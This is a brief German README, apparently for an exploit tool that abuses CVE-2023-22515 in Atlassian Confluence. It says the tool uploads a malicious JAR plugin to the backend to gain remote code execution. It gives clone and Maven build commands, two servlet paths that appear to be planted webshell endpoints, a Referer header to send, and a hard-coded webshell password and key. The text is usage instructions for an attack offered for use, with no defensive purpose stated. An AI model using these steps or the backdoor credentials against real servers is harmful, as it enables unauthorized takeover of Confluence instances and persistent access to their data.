
Ermöglicht RCE durch Hochladen eines JAR-Pakets im Backend unter Ausnutzung von CVE-2023-22515.
Verwendet CVE-2023-22515, um eine JAR-Datei im Backend hochzuladen und RCE zu erreichen
git clone https://github.com/aaaademo/Confluence-EvilJar
cd Confluence-EvilJar
mvn package
http://confluence.local/plugins/servlet/testbin/cmServlet
http://confluence.local/plugins/servlet/testbin/gzServlet
Referer: https://www.baidu.com/
p@ssw0rd / key